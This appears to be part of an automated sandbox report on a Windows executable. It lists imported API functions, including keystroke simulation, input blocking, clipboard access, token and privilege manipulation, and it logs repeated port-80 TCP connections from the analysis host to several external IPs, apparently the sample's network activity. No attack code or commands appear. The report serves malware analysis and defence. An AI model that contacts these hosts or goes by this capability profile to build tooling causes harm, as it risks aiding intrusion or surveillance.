USER32.dll | SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
GDI32.dll | SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll | RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit
Language of compilation system | Country where language is spoken
English | Great Britain
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                            Nov 22, 2024 07:55:49.498872042 CET8049817199.59.243.227192.168.2.5
                                                                                                            Nov 22, 2024 07:55:49.498990059 CET4981780192.168.2.5199.59.243.227
                                                                                                            Nov 22, 2024 07:55:49.538902044 CET4981780192.168.2.5199.59.243.227
                                                                                                            Nov 22, 2024 07:55:49.658467054 CET8049817199.59.243.227192.168.2.5
                                                                                                            Nov 22, 2024 07:55:49.658571005 CET8049817199.59.243.227192.168.2.5
                                                                                                            Nov 22, 2024 07:55:50.646589994 CET8049817199.59.243.227192.168.2.5
                                                                                                            Nov 22, 2024 07:55:50.646948099 CET8049817199.59.243.227192.168.2.5
                                                                                                            Nov 22, 2024 07:55:50.646980047 CET8049817199.59.243.227192.168.2.5
                                                                                                            Nov 22, 2024 07:55:50.647011042 CET4981780192.168.2.5199.59.243.227
                                                                                                            Nov 22, 2024 07:55:50.647059917 CET4981780192.168.2.5199.59.243.227
                                                                                                            Nov 22, 2024 07:55:51.043891907 CET4981780192.168.2.5199.59.243.227
                                                                                                            Nov 22, 2024 07:55:52.062416077 CET4982480192.168.2.5199.59.243.227
                                                                                                            Nov 22, 2024 07:55:52.182014942 CET8049824199.59.243.227192.168.2.5
                                                                                                            Nov 22, 2024 07:55:52.182116032 CET4982480192.168.2.5199.59.243.227
                                                                                                            Nov 22, 2024 07:55:52.190720081 CET4982480192.168.2.5199.59.243.227
                                                                                                            Nov 22, 2024 07:55:52.310400009 CET8049824199.59.243.227192.168.2.5
                                                                                                            Nov 22, 2024 07:55:53.295386076 CET8049824199.59.243.227192.168.2.5
                                                                                                            Nov 22, 2024 07:55:53.295433044 CET8049824199.59.243.227192.168.2.5
                                                                                                            Nov 22, 2024 07:55:53.295471907 CET8049824199.59.243.227192.168.2.5
                                                                                                            Nov 22, 2024 07:55:53.295625925 CET4982480192.168.2.5199.59.243.227
                                                                                                            Nov 22, 2024 07:55:53.295625925 CET4982480192.168.2.5199.59.243.227
                                                                                                            Nov 22, 2024 07:55:53.297792912 CET4982480192.168.2.5199.59.243.227
                                                                                                            Nov 22, 2024 07:55:53.417272091 CET8049824199.59.243.227192.168.2.5
                                                                                                            Nov 22, 2024 07:55:59.484168053 CET4984080192.168.2.5146.88.233.115
                                                                                                            Nov 22, 2024 07:55:59.603960991 CET8049840146.88.233.115192.168.2.5
                                                                                                            Nov 22, 2024 07:55:59.604059935 CET4984080192.168.2.5146.88.233.115
                                                                                                            Nov 22, 2024 07:55:59.618520021 CET4984080192.168.2.5146.88.233.115
                                                                                                            Nov 22, 2024 07:55:59.738006115 CET8049840146.88.233.115192.168.2.5
                                                                                                            Nov 22, 2024 07:56:01.122010946 CET4984080192.168.2.5146.88.233.115
                                                                                                            Nov 22, 2024 07:56:01.130518913 CET8049840146.88.233.115192.168.2.5
                                                                                                            Nov 22, 2024 07:56:01.130652905 CET4984080192.168.2.5146.88.233.115
                                                                                                            Nov 22, 2024 07:56:01.131331921 CET8049840146.88.233.115192.168.2.5
                                                                                                            Nov 22, 2024 07:56:01.131408930 CET4984080192.168.2.5146.88.233.115
                                                                                                            Nov 22, 2024 07:56:01.241627932 CET8049840146.88.233.115192.168.2.5
                                                                                                            Nov 22, 2024 07:56:01.241739988 CET4984080192.168.2.5146.88.233.115
                                                                                                            Nov 22, 2024 07:56:02.141469955 CET4984680192.168.2.5146.88.233.115
                                                                                                            Nov 22, 2024 07:56:02.320950985 CET8049846146.88.233.115192.168.2.5
                                                                                                            Nov 22, 2024 07:56:02.321049929 CET4984680192.168.2.5146.88.233.115
                                                                                                            Nov 22, 2024 07:56:02.335922956 CET4984680192.168.2.5146.88.233.115
                                                                                                            Nov 22, 2024 07:56:02.456599951 CET8049846146.88.233.115192.168.2.5
                                                                                                            Nov 22, 2024 07:56:03.594099998 CET8049846146.88.233.115192.168.2.5
                                                                                                            Nov 22, 2024 07:56:03.594203949 CET8049846146.88.233.115192.168.2.5
                                                                                                            Nov 22, 2024 07:56:03.594271898 CET4984680192.168.2.5146.88.233.115
                                                                                                            Nov 22, 2024 07:56:03.840811968 CET4984680192.168.2.5146.88.233.115
                                                                                                            Nov 22, 2024 07:56:04.859210014 CET4985580192.168.2.5146.88.233.115
                                                                                                            Nov 22, 2024 07:56:04.978837967 CET8049855146.88.233.115192.168.2.5
                                                                                                            Nov 22, 2024 07:56:04.978984118 CET4985580192.168.2.5146.88.233.115
                                                                                                            Nov 22, 2024 07:56:04.998981953 CET4985580192.168.2.5146.88.233.115
                                                                                                            Nov 22, 2024 07:56:05.118870020 CET8049855146.88.233.115192.168.2.5
                                                                                                            Nov 22, 2024 07:56:05.118915081 CET8049855146.88.233.115192.168.2.5
                                                                                                            Nov 22, 2024 07:56:06.385685921 CET8049855146.88.233.115192.168.2.5
                                                                                                            Nov 22, 2024 07:56:06.385793924 CET8049855146.88.233.115192.168.2.5
                                                                                                            Nov 22, 2024 07:56:06.385986090 CET4985580192.168.2.5146.88.233.115
                                                                                                            Nov 22, 2024 07:56:06.512615919 CET4985580192.168.2.5146.88.233.115
                                                                                                            Nov 22, 2024 07:56:07.532397985 CET4986280192.168.2.5146.88.233.115
                                                                                                            Nov 22, 2024 07:56:07.652004004 CET8049862146.88.233.115192.168.2.5
                                                                                                            Nov 22, 2024 07:56:07.652082920 CET4986280192.168.2.5146.88.233.115
                                                                                                            Nov 22, 2024 07:56:07.662118912 CET4986280192.168.2.5146.88.233.115
                                                                                                            Nov 22, 2024 07:56:07.782016039 CET8049862146.88.233.115192.168.2.5
                                                                                                            Nov 22, 2024 07:56:09.016925097 CET8049862146.88.233.115192.168.2.5
                                                                                                            Nov 22, 2024 07:56:09.017031908 CET8049862146.88.233.115192.168.2.5
                                                                                                            Nov 22, 2024 07:56:09.017085075 CET4986280192.168.2.5146.88.233.115
                                                                                                            Nov 22, 2024 07:56:09.019701958 CET4986280192.168.2.5146.88.233.115
                                                                                                            Nov 22, 2024 07:56:09.139280081 CET8049862146.88.233.115192.168.2.5
                                                                                                            Nov 22, 2024 07:56:14.979163885 CET4987980192.168.2.5194.85.61.76
                                                                                                            Nov 22, 2024 07:56:15.098839998 CET8049879194.85.61.76192.168.2.5
                                                                                                            Nov 22, 2024 07:56:15.098948956 CET4987980192.168.2.5194.85.61.76
                                                                                                            Nov 22, 2024 07:56:15.111445904 CET4987980192.168.2.5194.85.61.76
                                                                                                            Nov 22, 2024 07:56:15.231199980 CET8049879194.85.61.76192.168.2.5
                                                                                                            Nov 22, 2024 07:56:16.488099098 CET8049879194.85.61.76192.168.2.5
                                                                                                            Nov 22, 2024 07:56:16.488171101 CET8049879194.85.61.76192.168.2.5
                                                                                                            Nov 22, 2024 07:56:16.488387108 CET4987980192.168.2.5194.85.61.76
                                                                                                            Nov 22, 2024 07:56:16.622097015 CET4987980192.168.2.5194.85.61.76
                                                                                                            Nov 22, 2024 07:56:17.640552998 CET4988580192.168.2.5194.85.61.76
                                                                                                            Nov 22, 2024 07:56:17.760288000 CET8049885194.85.61.76192.168.2.5
                                                                                                            Nov 22, 2024 07:56:17.760608912 CET4988580192.168.2.5194.85.61.76
                                                                                                            Nov 22, 2024 07:56:17.774687052 CET4988580192.168.2.5194.85.61.76
                                                                                                            Nov 22, 2024 07:56:17.895689011 CET8049885194.85.61.76192.168.2.5
                                                                                                            Nov 22, 2024 07:56:19.223676920 CET8049885194.85.61.76192.168.2.5
                                                                                                            Nov 22, 2024 07:56:19.224083900 CET8049885194.85.61.76192.168.2.5
                                                                                                            Nov 22, 2024 07:56:19.224147081 CET4988580192.168.2.5194.85.61.76
                                                                                                            Nov 22, 2024 07:56:19.278307915 CET4988580192.168.2.5194.85.61.76
                                                                                                            Nov 22, 2024 07:56:20.305730104 CET4989180192.168.2.5194.85.61.76
                                                                                                            Nov 22, 2024 07:56:20.425527096 CET8049891194.85.61.76192.168.2.5
                                                                                                            Nov 22, 2024 07:56:20.425690889 CET4989180192.168.2.5194.85.61.76
                                                                                                            Nov 22, 2024 07:56:20.439014912 CET4989180192.168.2.5194.85.61.76
                                                                                                            Nov 22, 2024 07:56:20.558758020 CET8049891194.85.61.76192.168.2.5
                                                                                                            Nov 22, 2024 07:56:20.559005022 CET8049891194.85.61.76192.168.2.5
                                                                                                            Nov 22, 2024 07:56:21.825508118 CET8049891194.85.61.76192.168.2.5
                                                                                                            Nov 22, 2024 07:56:21.825643063 CET8049891194.85.61.76192.168.2.5
                                                                                                            Nov 22, 2024 07:56:21.825840950 CET4989180192.168.2.5194.85.61.76
                                                                                                            Nov 22, 2024 07:56:21.950448036 CET4989180192.168.2.5194.85.61.76
                                                                                                            Nov 22, 2024 07:56:22.969039917 CET4989980192.168.2.5194.85.61.76
                                                                                                            Nov 22, 2024 07:56:23.088855982 CET8049899194.85.61.76192.168.2.5
                                                                                                            Nov 22, 2024 07:56:23.089046001 CET4989980192.168.2.5194.85.61.76
                                                                                                            Nov 22, 2024 07:56:23.102030039 CET4989980192.168.2.5194.85.61.76
                                                                                                            Nov 22, 2024 07:56:23.221699953 CET8049899194.85.61.76192.168.2.5
                                                                                                            Nov 22, 2024 07:56:24.521514893 CET8049899194.85.61.76192.168.2.5
                                                                                                            Nov 22, 2024 07:56:24.521595955 CET8049899194.85.61.76192.168.2.5
                                                                                                            Nov 22, 2024 07:56:24.521763086 CET4989980192.168.2.5194.85.61.76
                                                                                                            Nov 22, 2024 07:56:24.524585962 CET4989980192.168.2.5194.85.61.76
                                                                                                            Nov 22, 2024 07:56:24.644253016 CET8049899194.85.61.76192.168.2.5
                                                                                                            Nov 22, 2024 07:56:30.652128935 CET4991880192.168.2.547.76.213.197
                                                                                                            Nov 22, 2024 07:56:30.771864891 CET804991847.76.213.197192.168.2.5
                                                                                                            Nov 22, 2024 07:56:30.772016048 CET4991880192.168.2.547.76.213.197
                                                                                                            Nov 22, 2024 07:56:30.787024021 CET4991880192.168.2.547.76.213.197
                                                                                                            Nov 22, 2024 07:56:30.906604052 CET804991847.76.213.197192.168.2.5
                                                                                                            Nov 22, 2024 07:56:32.293979883 CET4991880192.168.2.547.76.213.197
                                                                                                            Nov 22, 2024 07:56:32.406029940 CET804991847.76.213.197192.168.2.5
                                                                                                            Nov 22, 2024 07:56:32.406128883 CET4991880192.168.2.547.76.213.197
                                                                                                            Nov 22, 2024 07:56:32.406183958 CET804991847.76.213.197192.168.2.5
                                                                                                            Nov 22, 2024 07:56:32.406255960 CET4991880192.168.2.547.76.213.197
                                                                                                            Nov 22, 2024 07:56:32.413496971 CET804991847.76.213.197192.168.2.5
                                                                                                            Nov 22, 2024 07:56:32.413593054 CET4991880192.168.2.547.76.213.197
                                                                                                            Nov 22, 2024 07:56:33.312105894 CET4992480192.168.2.547.76.213.197
                                                                                                            Nov 22, 2024 07:56:33.432167053 CET804992447.76.213.197192.168.2.5
                                                                                                            Nov 22, 2024 07:56:33.433639050 CET4992480192.168.2.547.76.213.197
                                                                                                            Nov 22, 2024 07:56:33.447989941 CET4992480192.168.2.547.76.213.197
                                                                                                            Nov 22, 2024 07:56:33.567709923 CET804992447.76.213.197192.168.2.5
                                                                                                            Nov 22, 2024 07:56:34.950346947 CET4992480192.168.2.547.76.213.197
                                                                                                            Nov 22, 2024 07:56:35.040144920 CET804992447.76.213.197192.168.2.5
                                                                                                            Nov 22, 2024 07:56:35.040435076 CET4992480192.168.2.547.76.213.197
                                                                                                            Nov 22, 2024 07:56:35.040446043 CET804992447.76.213.197192.168.2.5
                                                                                                            Nov 22, 2024 07:56:35.040553093 CET4992480192.168.2.547.76.213.197
                                                                                                            Nov 22, 2024 07:56:35.070103884 CET804992447.76.213.197192.168.2.5
                                                                                                            Nov 22, 2024 07:56:35.070275068 CET4992480192.168.2.547.76.213.197
                                                                                                            Nov 22, 2024 07:56:35.976386070 CET4993080192.168.2.547.76.213.197
                                                                                                            Nov 22, 2024 07:56:36.096466064 CET804993047.76.213.197192.168.2.5
                                                                                                            Nov 22, 2024 07:56:36.096668959 CET4993080192.168.2.547.76.213.197
                                                                                                            Nov 22, 2024 07:56:36.111277103 CET4993080192.168.2.547.76.213.197
                                                                                                            Nov 22, 2024 07:56:36.230762005 CET804993047.76.213.197192.168.2.5
                                                                                                            Nov 22, 2024 07:56:36.230925083 CET804993047.76.213.197192.168.2.5
                                                                                                            Nov 22, 2024 07:56:37.622068882 CET4993080192.168.2.547.76.213.197
                                                                                                            Nov 22, 2024 07:56:37.679708958 CET804993047.76.213.197192.168.2.5
                                                                                                            Nov 22, 2024 07:56:37.679770947 CET804993047.76.213.197192.168.2.5
                                                                                                            Nov 22, 2024 07:56:37.679900885 CET4993080192.168.2.547.76.213.197
                                                                                                            Nov 22, 2024 07:56:37.679936886 CET4993080192.168.2.547.76.213.197
                                                                                                            Nov 22, 2024 07:56:37.741976976 CET804993047.76.213.197192.168.2.5
                                                                                                            Nov 22, 2024 07:56:37.742034912 CET4993080192.168.2.547.76.213.197
                                                                                                            Nov 22, 2024 07:56:38.640650988 CET4993780192.168.2.547.76.213.197
                                                                                                            Nov 22, 2024 07:56:38.760663033 CET804993747.76.213.197192.168.2.5
                                                                                                            Nov 22, 2024 07:56:38.760801077 CET4993780192.168.2.547.76.213.197
                                                                                                            Nov 22, 2024 07:56:38.770698071 CET4993780192.168.2.547.76.213.197
                                                                                                            Nov 22, 2024 07:56:38.890300989 CET804993747.76.213.197192.168.2.5
                                                                                                            Nov 22, 2024 07:56:40.298732042 CET804993747.76.213.197192.168.2.5
                                                                                                            Nov 22, 2024 07:56:40.298813105 CET804993747.76.213.197192.168.2.5
                                                                                                            Nov 22, 2024 07:56:40.298932076 CET4993780192.168.2.547.76.213.197
                                                                                                            Nov 22, 2024 07:56:40.301516056 CET4993780192.168.2.547.76.213.197
                                                                                                            Nov 22, 2024 07:56:40.421061993 CET804993747.76.213.197192.168.2.5
                                                                                                            Nov 22, 2024 07:56:46.083000898 CET4995680192.168.2.5208.91.197.27
                                                                                                            Nov 22, 2024 07:56:46.202653885 CET8049956208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:56:46.202815056 CET4995680192.168.2.5208.91.197.27
                                                                                                            Nov 22, 2024 07:56:46.216577053 CET4995680192.168.2.5208.91.197.27
                                                                                                            Nov 22, 2024 07:56:46.336828947 CET8049956208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:56:47.361414909 CET8049956208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:56:47.361646891 CET4995680192.168.2.5208.91.197.27
                                                                                                            Nov 22, 2024 07:56:47.731520891 CET4995680192.168.2.5208.91.197.27
                                                                                                            Nov 22, 2024 07:56:47.851202965 CET8049956208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:56:48.751182079 CET4996380192.168.2.5208.91.197.27
Timestamp                            Src Port  Dst Port  Source IP        Dest IP
Nov 22, 2024 07:56:48.870850086 CET  80        49963     208.91.197.27    192.168.2.5
Nov 22, 2024 07:56:48.870949030 CET  49963     80        192.168.2.5      208.91.197.27
Nov 22, 2024 07:56:48.885040045 CET  49963     80        192.168.2.5      208.91.197.27
Nov 22, 2024 07:56:49.004627943 CET  80        49963     208.91.197.27    192.168.2.5
Nov 22, 2024 07:56:50.387720108 CET  49963     80        192.168.2.5      208.91.197.27
Nov 22, 2024 07:56:50.472395897 CET  80        49963     208.91.197.27    192.168.2.5
Nov 22, 2024 07:56:50.472477913 CET  49963     80        192.168.2.5      208.91.197.27
Nov 22, 2024 07:56:50.472559929 CET  80        49963     208.91.197.27    192.168.2.5
Nov 22, 2024 07:56:50.472605944 CET  49963     80        192.168.2.5      208.91.197.27
Nov 22, 2024 07:56:50.507296085 CET  80        49963     208.91.197.27    192.168.2.5
Nov 22, 2024 07:56:51.407820940 CET  49968     80        192.168.2.5      208.91.197.27
Nov 22, 2024 07:56:51.527503967 CET  80        49968     208.91.197.27    192.168.2.5
Nov 22, 2024 07:56:51.527611971 CET  49968     80        192.168.2.5      208.91.197.27
Nov 22, 2024 07:56:51.547869921 CET  49968     80        192.168.2.5      208.91.197.27
Nov 22, 2024 07:56:51.667493105 CET  80        49968     208.91.197.27    192.168.2.5
Nov 22, 2024 07:56:51.667663097 CET  80        49968     208.91.197.27    192.168.2.5
Nov 22, 2024 07:56:52.733308077 CET  80        49968     208.91.197.27    192.168.2.5
Nov 22, 2024 07:56:52.733491898 CET  49968     80        192.168.2.5      208.91.197.27
Nov 22, 2024 07:56:53.059601068 CET  49968     80        192.168.2.5      208.91.197.27
Nov 22, 2024 07:56:53.179248095 CET  80        49968     208.91.197.27    192.168.2.5
Nov 22, 2024 07:56:54.078344107 CET  49975     80        192.168.2.5      208.91.197.27
Nov 22, 2024 07:56:54.198045015 CET  80        49975     208.91.197.27    192.168.2.5
Nov 22, 2024 07:56:54.198323011 CET  49975     80        192.168.2.5      208.91.197.27
Nov 22, 2024 07:56:54.212625027 CET  49975     80        192.168.2.5      208.91.197.27
Nov 22, 2024 07:56:54.332180023 CET  80        49975     208.91.197.27    192.168.2.5
Nov 22, 2024 07:56:56.263345003 CET  80        49975     208.91.197.27    192.168.2.5
Nov 22, 2024 07:56:56.263411999 CET  80        49975     208.91.197.27    192.168.2.5
Nov 22, 2024 07:56:56.263448000 CET  80        49975     208.91.197.27    192.168.2.5
Nov 22, 2024 07:56:56.263483047 CET  80        49975     208.91.197.27    192.168.2.5
Nov 22, 2024 07:56:56.263659000 CET  49975     80        192.168.2.5      208.91.197.27
Nov 22, 2024 07:56:56.308244944 CET  80        49975     208.91.197.27    192.168.2.5
Nov 22, 2024 07:56:56.308305025 CET  80        49975     208.91.197.27    192.168.2.5
Nov 22, 2024 07:56:56.308360100 CET  80        49975     208.91.197.27    192.168.2.5
Nov 22, 2024 07:56:56.308394909 CET  80        49975     208.91.197.27    192.168.2.5
Nov 22, 2024 07:56:56.308399916 CET  49975     80        192.168.2.5      208.91.197.27
Nov 22, 2024 07:56:56.308432102 CET  80        49975     208.91.197.27    192.168.2.5
Nov 22, 2024 07:56:56.308444023 CET  49975     80        192.168.2.5      208.91.197.27
Nov 22, 2024 07:56:56.308471918 CET  80        49975     208.91.197.27    192.168.2.5
Nov 22, 2024 07:56:56.308597088 CET  49975     80        192.168.2.5      208.91.197.27
Nov 22, 2024 07:56:56.383389950 CET  80        49975     208.91.197.27    192.168.2.5
Nov 22, 2024 07:56:56.384908915 CET  80        49975     208.91.197.27    192.168.2.5
Nov 22, 2024 07:56:56.385118961 CET  49975     80        192.168.2.5      208.91.197.27
Nov 22, 2024 07:56:56.464404106 CET  80        49975     208.91.197.27    192.168.2.5
Nov 22, 2024 07:56:56.464519024 CET  80        49975     208.91.197.27    192.168.2.5
Nov 22, 2024 07:56:56.464746952 CET  49975     80        192.168.2.5      208.91.197.27
Nov 22, 2024 07:56:56.468616962 CET  80        49975     208.91.197.27    192.168.2.5
Nov 22, 2024 07:56:56.468971968 CET  80        49975     208.91.197.27    192.168.2.5
Nov 22, 2024 07:56:56.469063044 CET  49975     80        192.168.2.5      208.91.197.27
Nov 22, 2024 07:56:56.477097988 CET  80        49975     208.91.197.27    192.168.2.5
Nov 22, 2024 07:56:56.477309942 CET  80        49975     208.91.197.27    192.168.2.5
Nov 22, 2024 07:56:56.477392912 CET  49975     80        192.168.2.5      208.91.197.27
Nov 22, 2024 07:56:56.485482931 CET  80        49975     208.91.197.27    192.168.2.5
Nov 22, 2024 07:56:56.485790968 CET  80        49975     208.91.197.27    192.168.2.5
Nov 22, 2024 07:56:56.485873938 CET  49975     80        192.168.2.5      208.91.197.27
Nov 22, 2024 07:56:56.509485960 CET  80        49975     208.91.197.27    192.168.2.5
Nov 22, 2024 07:56:56.509912014 CET  80        49975     208.91.197.27    192.168.2.5
Nov 22, 2024 07:56:56.510097980 CET  49975     80        192.168.2.5      208.91.197.27
Nov 22, 2024 07:56:56.513539076 CET  80        49975     208.91.197.27    192.168.2.5
Nov 22, 2024 07:56:56.513847113 CET  80        49975     208.91.197.27    192.168.2.5
Nov 22, 2024 07:56:56.513921022 CET  49975     80        192.168.2.5      208.91.197.27
Nov 22, 2024 07:56:56.521972895 CET  80        49975     208.91.197.27    192.168.2.5
Nov 22, 2024 07:56:56.522048950 CET  80        49975     208.91.197.27    192.168.2.5
Nov 22, 2024 07:56:56.522134066 CET  49975     80        192.168.2.5      208.91.197.27
Nov 22, 2024 07:56:56.530358076 CET  80        49975     208.91.197.27    192.168.2.5
Nov 22, 2024 07:56:56.530704021 CET  80        49975     208.91.197.27    192.168.2.5
Nov 22, 2024 07:56:56.530787945 CET  49975     80        192.168.2.5      208.91.197.27
Nov 22, 2024 07:56:56.538774967 CET  80        49975     208.91.197.27    192.168.2.5
Nov 22, 2024 07:56:56.539498091 CET  80        49975     208.91.197.27    192.168.2.5
Nov 22, 2024 07:56:56.539580107 CET  49975     80        192.168.2.5      208.91.197.27
Nov 22, 2024 07:56:56.547209978 CET  80        49975     208.91.197.27    192.168.2.5
Nov 22, 2024 07:56:56.547384024 CET  80        49975     208.91.197.27    192.168.2.5
Nov 22, 2024 07:56:56.547470093 CET  49975     80        192.168.2.5      208.91.197.27
Nov 22, 2024 07:56:56.555624962 CET  80        49975     208.91.197.27    192.168.2.5
Nov 22, 2024 07:56:56.602010012 CET  80        49975     208.91.197.27    192.168.2.5
Nov 22, 2024 07:56:56.602137089 CET  80        49975     208.91.197.27    192.168.2.5
Nov 22, 2024 07:56:56.602200985 CET  49975     80        192.168.2.5      208.91.197.27
Nov 22, 2024 07:56:56.606193066 CET  80        49975     208.91.197.27    192.168.2.5
Nov 22, 2024 07:56:56.606295109 CET  49975     80        192.168.2.5      208.91.197.27
Nov 22, 2024 07:56:56.608123064 CET  80        49975     208.91.197.27    192.168.2.5
Nov 22, 2024 07:56:56.608205080 CET  49975     80        192.168.2.5      208.91.197.27
Nov 22, 2024 07:56:56.608985901 CET  49975     80        192.168.2.5      208.91.197.27
Nov 22, 2024 07:56:56.728513002 CET  80        49975     208.91.197.27    192.168.2.5
Nov 22, 2024 07:57:02.371850014 CET  49994     80        192.168.2.5      8.210.114.150
Nov 22, 2024 07:57:02.491569996 CET  80        49994     8.210.114.150    192.168.2.5
Nov 22, 2024 07:57:02.491905928 CET  49994     80        192.168.2.5      8.210.114.150
Nov 22, 2024 07:57:02.505940914 CET  49994     80        192.168.2.5      8.210.114.150
Nov 22, 2024 07:57:02.625546932 CET  80        49994     8.210.114.150    192.168.2.5
Nov 22, 2024 07:57:04.012665987 CET  49994     80        192.168.2.5      8.210.114.150
Nov 22, 2024 07:57:04.115753889 CET  80        49994     8.210.114.150    192.168.2.5
Nov 22, 2024 07:57:04.115825891 CET  49994     80        192.168.2.5      8.210.114.150
Nov 22, 2024 07:57:04.115869045 CET  80        49994     8.210.114.150    192.168.2.5
Nov 22, 2024 07:57:04.115937948 CET  49994     80        192.168.2.5      8.210.114.150
Nov 22, 2024 07:57:04.132649899 CET  80        49994     8.210.114.150    192.168.2.5
Nov 22, 2024 07:57:04.132709980 CET  49994     80        192.168.2.5      8.210.114.150
Nov 22, 2024 07:57:05.032635927 CET  50001     80        192.168.2.5      8.210.114.150
Nov 22, 2024 07:57:05.152270079 CET  80        50001     8.210.114.150    192.168.2.5
Nov 22, 2024 07:57:05.152705908 CET  50001     80        192.168.2.5      8.210.114.150
Nov 22, 2024 07:57:05.171899080 CET  50001     80        192.168.2.5      8.210.114.150
Nov 22, 2024 07:57:05.291451931 CET  80        50001     8.210.114.150    192.168.2.5
Nov 22, 2024 07:57:06.684561014 CET  50001     80        192.168.2.5      8.210.114.150
Nov 22, 2024 07:57:06.801637888 CET  80        50001     8.210.114.150    192.168.2.5
Nov 22, 2024 07:57:06.801713943 CET  80        50001     8.210.114.150    192.168.2.5
Nov 22, 2024 07:57:06.801840067 CET  50001     80        192.168.2.5      8.210.114.150
Nov 22, 2024 07:57:06.801907063 CET  50001     80        192.168.2.5      8.210.114.150
Nov 22, 2024 07:57:06.804092884 CET  80        50001     8.210.114.150    192.168.2.5
Nov 22, 2024 07:57:06.804167032 CET  50001     80        192.168.2.5      8.210.114.150
Nov 22, 2024 07:57:07.704435110 CET  50004     80        192.168.2.5      8.210.114.150
Nov 22, 2024 07:57:07.825825930 CET  80        50004     8.210.114.150    192.168.2.5
